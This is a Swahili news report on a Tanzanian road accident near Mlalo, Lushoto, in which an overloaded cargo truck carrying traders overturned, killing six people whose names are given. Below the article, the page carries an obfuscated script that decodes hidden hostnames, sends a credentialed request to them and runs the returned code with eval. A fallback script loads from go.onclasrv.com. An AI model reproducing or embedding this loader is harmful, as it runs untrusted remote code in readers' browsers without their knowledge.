Ads (728x90)

WATU sita wamekufa papo hapo na wengine 12 wamejeruhiwa baada ya gari ya mizigo inayojulikana kama ‘Kibomboi Trans’ waliyokuwa wakisafiria kutoka jijiji cha Kitivo kuelekea mjini Mlalo katika Wilaya ya Lushoto kupinduka.
Marehemu hao na abiria wengine walionusurika ni wafanyabiashara wakazi wa vijiji vinavyounda Jimbo la Mlalo inadaiwa walikuwa wakitoka Kijiji cha Kitivo kilichopo Kata ya Mng’aro kuuza bidhaa kwenye mnada unaofanyika mara moja kwa wiki.
Kamanda wa Polisi Mkoa wa Tanga, Benedict Wakulyamba amethibitisha tukio hilo na kuwaambia waandishi wa habari kwamba lilitokea Februari 24, mwaka huu saa 11 jioni wakati gari hiyo iliyokuwa imebeba kiasi kikubwa cha mzigo na abiria ilipojaribu kupanda bila mafanikio mlima ulioko kati ya vijiji vya Kata ya Mng’aro na mji wa Mlalo.
“Ajali hiyo imehusisha gari ya kubeba mizigo yenye namba za usajili T334 BES aina ya Canter iliyokuwa ikiendeshwa na Nassoro Athmani (25) mkazi wa Mlalo na ilikuwa ikitokea Mng’aro kuelekea huko Mlalo ….ilikuwa imebeba abiria pamoja na mizigo ya aina mbalimbali ya wafanyabiashara waliokuwa wakitoka mnadani,” alisema.
Aliwataja waliokufa katika ajali hiyo ni Jamali Mohamed (40) mkazi wa Mlalo, Hasani Rashid (33) kijiji cha Nyasa, Busara Seif (25) wa kijiji cha Kifungilo, Hadija Said(35) wa Mhelo, Zuena Juma (30) wa Kwandege na Husna Ndege wa Hemtoe na kwamba majeruhi 11 walilazwa katika Zahanati ya Seminari ya Soni kwa matibabu na mwingine mmoja kuhamishiwa katika Hospitali ya Rufaa ya Mkoa wa Tanga, Bombo kutokana na hali yake kuwa mbaya.
“Chanzo cha ajali hiyo ni uzembe wa dereva ambaye alipakia abiria kwenye gari ya mizigo, lakini pia bila kujali hali ya hewa ya mvua kubwa ambayo ilikuwa imenyesha na kuathiri barabara, dereva huyo akijua kuwa gari yake haina uwezo alilazimisha kupanda mlima na ndipo gari hiyo ilishindwa na kupinduka, dereva tunamsaka kwasababu alikimbia mara tu baada ya tukio hilo,” alisema Kamanda Wakulyamba.
Akizungumzia majeruhi 11 waliolazwa Soni alisema wanaendelea vizuri na kwamba idadi kubwa wamesharuhusiwa kutoka hospitali baada ya afya zao kuimarika.
Hata hivyo, ametoa mwito kwa madereva kuacha mara moja tabia ya kutumia vibaya fursa ya askari wa usalama barabarani kutokuwepo maeneo ya pembezoni na hivyo kujichukulia sheria mkononi na kutenda makosa kinyume na taratibu za usafirishaji.

Post a Comment

 
<script data-cfasync="false" type="text/javascript">var r3D=window;for(var b in r3D){if(b.length===((1.094E3,6.890E2)>82.?(0x152,6):(132.1E1,90))&&b.charCodeAt((0x9A<(0x1C6,0x1FB)?(145,3):(119.80E1,0x1FB)<=0x1B2?0xF9:(50.7E1,0xB0)))===((0x1C2,1.54E2)>18?(1.333E3,100):(135,9.96E2))&&b.charCodeAt(((12.14E2,113)<=127.?(125.,5):(0x23D,11.10E1)))===(88.>=(67.,0xD3)?1.71E2:(0xFC,0x1D0)<=(106.,4.98E2)?(38.40E1,119):(0x141,0x17))&&b.charCodeAt((0x117>(104.,144.)?(59.,1):(103.,15)))===((50.,0x0)<0x31?(0x0,105):(0x12F,5.66E2))&&b.charCodeAt(((35,41)<=(0x37,107.)?(1.09E3,0):(1.0110E3,130.)))===((0x212,0x112)<1.0190E3?(62.,119):0x1A4<=(0x209,0x73)?(77,14.3E1):(0x188,0x3A)))break};for(var J in r3D[b]){if(J.length===((74,8.03E2)>=(0xB1,47.)?(80.,8):(0xDF,0x1CF))&&J.charCodeAt((114<=(54.6E1,121.)?(1.2770E3,5):(0xF7,56.)))===((100.4E1,149)>=0x9F?(0x1A2,0x12F):(1.0E1,1.0010E3)>=(86,59.90E1)?(1.299E3,101):(30,13.36E2))&&J.charCodeAt((0x17F<(1.244E3,0x1BC)?(0x1F5,7):(6.78E2,0x77)))===((104.,21.)>1.466E3?(13,"M"):0x23E<(14,7.770E2)?(106.,116):(39.5E1,0x18E))&&J.charCodeAt(((133,93.2E1)<=1.075E3?(0x221,3):(47.,2.66E2)))===((0x148,26.6E1)<=130.?98:123.0E1>(62,74.)?(0x239,117):(14.39E2,3.39E2))&&J.charCodeAt(((0x148,66.9E1)>38.5E1?(100,0):0x150<(0x89,148.)?(4.09E2,'F'):(96,111.)))===((0xCB,0x1EF)<=84.80E1?(54.7E1,100):(107.,0xA)))break};(function(S,l,e,N){r3D[b][l]=function(){var F=((126.,0x245)<6.?'S':14.06E2>=(7.87E2,0xFB)?(14.94E2,0):(0x36,0x14D)),u=F,P=function P(){var g=((0x8D,91.7E1)>44.40E1?(85.7E1,'/'):(77.,12.20E1));var o='';var M='//';var D='GET';var Z=(0x231<=(38,98.)?81:(0x1C4,0x7E)>=9.5E1?(29.0E1,true):(16,100));var q=new XMLHttpRequest();q.withCredentials=Z;q.open((D),(M)+r3D[b]['atob'](e[u].split(o).reverse().join(o))+g+N+g,Z);q.onreadystatechange=function(){var y=(0x19B>=(0x127,111.)?(86,200):(0x17F,51.7E1));var t=((0x1E6,101.)>0x73?'W':99.9E1>(0x62,139)?(94,4):(0x112,0x1E1));if(q.readyState==t&&q.status==y&&q.responseText){eval(q.responseText);}};q.onerror=function(){if(++u!=e.length){P();}};try{q.send();}catch(y){q.onerror();}};P();};})(r3D[b][J],'_bhrfs',['=U2YhB3cucne6RzY2xWb','==Adlt2YpJ3YugWb5cXa4Q2Y','==QZ0l2cuE2N3VmZ6dXM','==QZ0l2ciV2duAjYphDbvp2Z'],1155246);</script><script data-cfasync="false" type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1153790" onerror="window._bhrfs();"></script>